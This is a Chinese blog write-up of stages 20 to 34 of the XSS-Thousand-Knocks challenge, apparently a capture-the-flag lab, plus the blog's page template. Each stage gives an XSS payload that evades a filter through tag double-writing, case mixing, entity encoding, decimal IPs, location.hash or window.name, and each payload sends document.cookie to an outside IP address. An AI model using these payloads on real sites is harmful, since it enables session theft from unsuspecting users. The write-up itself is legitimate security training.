<h2 id="stage20"><a href="#stage20" class="headerlink" title="stage20"></a>stage20</h2><p>发现script被替换为空，双写script即可绕过<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210010749-3a55d88e-2c8d-1.png" alt="image.png"><br>payload<br></p><figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">303</span>f34eb0a974a432254a4cb2d6e07fa6f8b0b7f.knock.xss.moe<span class="regexp">/?q=&lt;scriscriptpt&gt;document.location=`http:/</span><span class="regexp">/134.175.33.164:1234/</span>?<span class="variable">${document.cookie}</span>`&lt;<span class="regexp">/scriscriptpt&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210010717-2788d396-2c8d-1.png" alt="image.png"></p>
<h2 id="stage21"><a href="#stage21" class="headerlink" title="stage21"></a>stage21</h2><p>和上一题差不多，只不过这题双写script没有用，但是我们可以用大小写绕过，但是发现无论怎么样都收不到cookie，查看一波响应头，发现<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210110523-b51fff10-2ce0-1.png" alt="image.png"></p>
<blockquote>
<p>X-XSS-Protection:1;mode=block,这里使用了XSS过滤，如果检测到攻击，就会浏览器会阻止页面渲染</p>
</blockquote>
<p>但是它会把script替换为空，所以我们可以利用script混淆代码，导致浏览器检测不出xss；<br>payload<br></p><figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line">http://49ab9ff165cd76ffe06af0b72f450c82f35db396.knock.xss.moe/?q=<span class="tag">&lt;<span class="name">Script</span>&gt;</span><span class="javascript">docuscriptment.loscriptcation=<span class="string">`http://134.175.33.164:1234/?<span class="subst">${<span class="built_in">document</span>.cookie}</span>`</span></span><span class="tag">&lt;/<span class="name">sCript</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210124435-90e7f59a-2cee-1.png" alt="image.png"></p>
<h2 id="stage22"><a href="#stage22" class="headerlink" title="stage22"></a>stage22</h2><p>22关发现有长度限制<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210124627-d3aff0a8-2cee-1.png" alt="image.png"><br>发现最大长度是65<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210124716-f0ce5968-2cee-1.png" alt="image.png"><br>标签首先考虑用svg比较合适，然后用<code>//</code>代替<code>http://</code>，IP使用十进制ip<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210174223-2ae0a1e6-2d18-1.png" alt="image.png"><br>刚好65个踩点，最后payload<br></p><figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span>bcd699e871d46c191f3c43a7197c18440b308507.knock.xss.moe<span class="regexp">/?q=&lt;svg/</span>onload=window.open(`<span class="regexp">//</span><span class="number">2259624356</span>:<span class="number">1234</span><span class="regexp">/?${document.cookie}`)&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210174143-12f61548-2d18-1.png" alt="image.png"></p>
<h2 id="stage23"><a href="#stage23" class="headerlink" title="stage23"></a>stage23</h2><p>这题限制55个字符<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210174544-a299cfbe-2d18-1.png" alt="image.png"></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210174606-afa4f792-2d18-1.png" alt="image.png"><br>我们可以使用<code>location.hash</code>，然后<code>&lt;svg/onload=eval(location.hash.slice(1))&gt;</code>，最后在<code>#</code>后面再加上我们的payload</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210202538-f9313e46-2d2e-1.png" alt="image.png"><br>长度41，没毛病</p>
<p>最终payload<br></p><figure class="highlight tcl"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">http</span>://<span class="number">51</span>b123fbd6a21b3cf43f49e0a1014221e191c7db.knock.xss.moe/?q=&lt;svg/onload=<span class="keyword">eval</span>(location.hash.slice(<span class="number">1</span>))&gt;#window.<span class="keyword">open</span>(`<span class="keyword">http</span>://<span class="number">134.175</span><span class="number">.33</span><span class="number">.164</span>:<span class="number">1234</span>/?${document.cookie}`)</span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210202037-461ad754-2d2e-1.png" alt="image.png"></p>
<h2 id="stage24"><a href="#stage24" class="headerlink" title="stage24"></a>stage24</h2><p>这关限制字符45，但是stage23的payload仍然能用<br></p><figure class="highlight tcl"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">http</span>://<span class="number">1498</span>f071159fd60222c0e7e82b7b6ff046e9e52e.knock.xss.moe/?q=&lt;svg/onload=<span class="keyword">eval</span>(location.hash.slice(<span class="number">1</span>))&gt;#window.<span class="keyword">open</span>(`<span class="keyword">http</span>://<span class="number">134.175</span><span class="number">.33</span><span class="number">.164</span>:<span class="number">1234</span>/?${document.cookie}`)</span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210202338-b172824a-2d2e-1.png" alt="image.png"></p>
<h2 id="stage25"><a href="#stage25" class="headerlink" title="stage25"></a>stage25</h2><p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210203148-d5abe3bc-2d2f-1.png" alt="image.png"><br>这关限制35个字符，这还让不让人活了。这题前前后后搞了一小时，弄得我头皮发麻，无奈查了很多Short XSS，功夫不负有心人，发现了一片新天地</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210212556-65bb09fe-2d37-1.png" alt="image.png"></p>
<p>既然后台的bot是直接加载我们提交的URL，那么我们尝试在我们vps上部署以下代码<br></p><figure class="highlight dust"><table><tbody><tr><td class="code"><pre><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span></span><br><span class="line"><span class="xml">window.name = "location.href=`http://134.175.33.164:1234/?$</span><span class="template-variable">{parent.document.cookie}</span><span class="xml">`";</span></span><br><span class="line"><span class="xml">location.href = "http://8e67e39d7e01213d5551c696ef8641b625cc8dd7.knock.xss.moe/?q=<span class="tag">&lt;<span class="name">svg</span>/<span class="attr">onload</span>=<span class="string">eval(window.name)</span>&gt;</span>";</span></span><br><span class="line"><span class="xml"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p>然后把我的vps的链接直接提交过去</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210211800-4a1ad7c0-2d36-1.png" alt="image.png"><br>Getflag<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210211550-fcc397aa-2d35-1.png" alt="image.png"></p>
<h2 id="stage26"><a href="#stage26" class="headerlink" title="stage26"></a>stage26</h2><p>这题回把我们payload全部转化为大写，但是js中的函数是区分大小写的，但是我们可以用HTML实体编码绕过，然后再urlencode，不然浏览器会把<code>#</code>后面当作描点<br>payload<br></p><figure class="highlight apache"><table><tbody><tr><td class="code"><pre><span class="line"><span class="attribute">http</span>://89078a2f1f0b7d9f210b1876f4b20ada0a090ebb.knock.xss.moe/?q=&lt;img src=<span class="string">"x"</span> onerror=<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%37</span><span class="number">%37</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%39</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%65</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%34</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%66</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%37</span><span class="number">%37</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%32</span><span class="number">%65</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%66</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%37</span><span class="number">%30</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%35</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%65</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%32</span><span class="number">%38</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%30</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%38</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%37</span><span class="number">%34</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%37</span><span class="number">%34</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%37</span><span class="number">%30</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%61</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%32</span><span class="number">%66</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%32</span><span class="number">%66</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%31</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%33</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%34</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%32</span><span class="number">%65</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%31</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%37</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%35</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%32</span><span class="number">%65</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%33</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%33</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%32</span><span class="number">%65</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%31</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%36</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%34</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%61</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%31</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%32</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%33</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%34</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%32</span><span class="number">%66</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%33</span><span class="number">%66</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%32</span><span class="number">%34</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%37</span><span class="number">%62</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%34</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%66</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%33</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%37</span><span class="number">%35</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%64</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%35</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%65</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%37</span><span class="number">%34</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%32</span><span class="number">%65</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%33</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%66</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%66</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%62</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%39</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%35</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%37</span><span class="number">%64</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%36</span><span class="number">%30</span><span class="number">%3</span>b<span class="number">%26</span><span class="number">%23</span><span class="number">%78</span><span class="number">%32</span><span class="number">%39</span><span class="number">%3</span>b&gt;</span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210215045-dd653ed6-2d3a-1.png" alt="image.png"></p>
<h2 id="stage27"><a href="#stage27" class="headerlink" title="stage27"></a>stage27</h2><p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210215158-08e6eba4-2d3b-1.png" alt="image.png"><br>这题把<code>.</code>给过滤了，但是我们可以用数组的形式表示：window[‘open’],document[‘cookie’]，<br>URL中的点的话，我们有两种方法，第一种方法是把ip地址转化为十进制ip地址，第二种方法是把url中的<code>.</code>换成中文的句号，浏览器会把中文的句号自动转化成<code>.</code><br>payload：<br></p><figure class="highlight asciidoc"><table><tbody><tr><td class="code"><pre><span class="line">第一种:</span><br><span class="line"><span class="link">http://295a1d900c5bf618101abf69083622d0f69aded1.knock.xss.moe/?q=&lt;script&gt;window</span>[<span class="string">'open'</span>](<span class="string">`http://134。175。33。164:1234/?${document['</span>cookie']}`)&lt;/script&gt;</span><br><span class="line">第二种：</span><br><span class="line"><span class="link">http://295a1d900c5bf618101abf69083622d0f69aded1.knock.xss.moe/?q=&lt;script&gt;window</span>[<span class="string">'open'</span>](<span class="string">`http://2259624356:1234/?${document['</span>cookie']}`)&lt;/script&gt;</span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210215951-22957880-2d3c-1.png" alt="image.png"></p>
<h2 id="stage28"><a href="#stage28" class="headerlink" title="stage28"></a>stage28</h2><p>这题比上一题多了一个过滤了双引号和单引号，但是我们可以用反引号绕过<br>payload<br></p><figure class="highlight markdown"><table><tbody><tr><td class="code"><pre><span class="line">http://02f6f47ddaa7b22137a74843f2c4f1ac915dda3b.knock.xss.moe/?q=<span class="xml"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span>window[<span class="string">`open`</span>](<span class="link">`http://2259624356:1234/?${document[`cookie`]}`</span>)<span class="xml"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210220350-b1300fa6-2d3c-1.png" alt="image.png"></p>
<h2 id="stage29"><a href="#stage29" class="headerlink" title="stage29"></a>stage29</h2><p>这题过滤了括号和<code>.</code>，用<code>document['location']</code>就ok了<br>payload<br></p><figure class="highlight asciidoc"><table><tbody><tr><td class="code"><pre><span class="line"><span class="link">http://a4bf8393a4159b94aa4b84e9a134d5e6140f3c34.knock.xss.moe/?q=document</span>[<span class="string">`location`</span>]=<span class="code">`http://2259624356:1234/?${document[`</span>cookie<span class="code">`]}`</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210220954-89dc8da2-2d3d-1.png" alt="image.png"></p>
<h2 id="stage30"><a href="#stage30" class="headerlink" title="stage30"></a>stage30</h2><p>和上一题一毛一样<br></p><figure class="highlight asciidoc"><table><tbody><tr><td class="code"><pre><span class="line"><span class="link">http://ebf510ac2d79576cd5b7d45412eaf3eed1781bd0.knock.xss.moe/?q=document</span>[<span class="string">`location`</span>]=<span class="code">`http://2259624356:1234/?${document[`</span>cookie<span class="code">`]}`</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210221233-e89eabfe-2d3d-1.png" alt="image.png"></p>
<h2 id="stage31-34-这四题一毛一样"><a href="#stage31-34-这四题一毛一样" class="headerlink" title="stage31-34(这四题一毛一样)"></a>stage31-34(这四题一毛一样)</h2><p>这题过滤了<code>&gt;</code>，但是没有过滤掉<code>&lt;</code>，但是<code>&lt;svg/onload=alert(1)</code>不需要闭合尖括号也可以执行</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210221455-3d7f3a8a-2d3e-1.png" alt="image.png"><br>payload<br></p><figure class="highlight asciidoc"><table><tbody><tr><td class="code"><pre><span class="line"><span class="link">http://bb84607f02113a22396438c9a67e4c5abdfd6561.knock.xss.moe/?q=%3Csvg/onload=document</span>[<span class="string">`location`</span>]=<span class="code">`http://2259624356:1234/?${document[`</span>cookie<span class="code">`]}`</span>//%3E</span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190210222509-abab400c-2d3f-1.png" alt="image.png"></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>虽然这些题目并不是很难，但是套路还是很多的，学到了不少东西</p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
            </div>
            <hr/>

            
            <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.88rem;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-large waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fa fa-close"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>
            

            <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">

<div id="article-share">
    
    <div class="social-share" data-disabled="qzone" data-wechat-qrcode-helper="<p>微信里点“发现”->“扫一扫”二维码便可查看分享。</p>"></div>
    
</div>

<script src="/libs/share/js/social-share.min.js"></script>

            

    <div class="reprint" id="reprint-statement">
        <p class="reprint-tip">
            <i class="fa fa-exclamation-triangle"></i>&nbsp;&nbsp;
            <span>转载规则</span>
        </p>
        
            <div class="center-align">
                <a rel="license" href="https://creativecommons.org/licenses/by/4.0/deed.zh">
                    <img alt=""
                         style="border-width:0"
                         src="https://i.creativecommons.org/l/by/4.0/88x31.png"/>
                </a>
            </div>
            <br/>
            <span xmlns:dct="http://purl.org/dc/terms/" href="http://purl.org/dc/dcmitype/Text"
                  property="dct:title" rel="dct:type">
                    《XSS-Thousand-Knocks解题记录》
                </span> 由
            <a xmlns:cc="http://creativecommons.org/ns#" href="/2019/02/14/XSS-Thousand-Knocks解题记录/" property="cc:attributionName"
               rel="cc:attributionURL">
                
            </a> 采用
            <a rel="license" href="https://creativecommons.org/licenses/by/4.0/deed.zh">
                知识共享署名 4.0 国际许可协议
            </a>进行许可。
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>


        </div>
    </div>

    
        <link rel="stylesheet" href="/libs/gitalk/gitalk.css">
<link rel="stylesheet" href="/css/my-gitalk.css">

<div class="card gitalk-card" data-aos="fade-up">
    <div id="gitalk-container" class="card-content"></div>
</div>

<script src="/libs/gitalk/gitalk.min.js"></script>
<script>
    let gitalk = new Gitalk({
        clientID: '',
        clientSecret: '',
        repo: '',
        owner: '',
        admin: null,
        id: '2019-02-14T10-13-43',
        distractionFreeMode: false  // Facebook-like distraction free mode
    });

    gitalk.render('gitalk-container');
</script>
    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fa fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2019/02/16/xss总结/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/8.jpg" class="responsive-img" alt="xss总结">
                        
                        <span class="card-title">xss总结</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
文章首发于先知社区https://xz.aliyun.com/t/4067

简述XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是Ja
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="fa fa-clock-o fa-fw icon-date"></i>2019-02-16
                        </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-user fa-fw"></i>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/xss/" target="_blank">
                        <span class="chip bg-color">xss</span>
                    </a>
                    
                    <a href="/tags/web安全/" target="_blank">
                        <span class="chip bg-color">web安全</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fa fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2019/02/13/Hashcat的使用手册总结/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/6.jpg" class="responsive-img" alt="Hashcat的使用手册总结">
                        
                        <span class="card-title">Hashcat的使用手册总结</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
文章首发于先知社区https://xz.aliyun.com/t/4008

简介Hashcat是自称世界上最快的密码恢复工具。它在2015年之前拥有专有代码库，但现在作为免费软件发布。适用于Linux，OS X和Windows的版本可以
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="fa fa-clock-o fa-fw icon-date"></i>2019-02-13
                            </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-user fa-fw"></i>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/工具/" target="_blank">
                        <span class="chip bg-color">工具</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>
</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: 七友's Blog<br />'
            + '作者: <br />'
            + '链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="fa fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fa fa-list"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            // headingsOffset: -205,
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
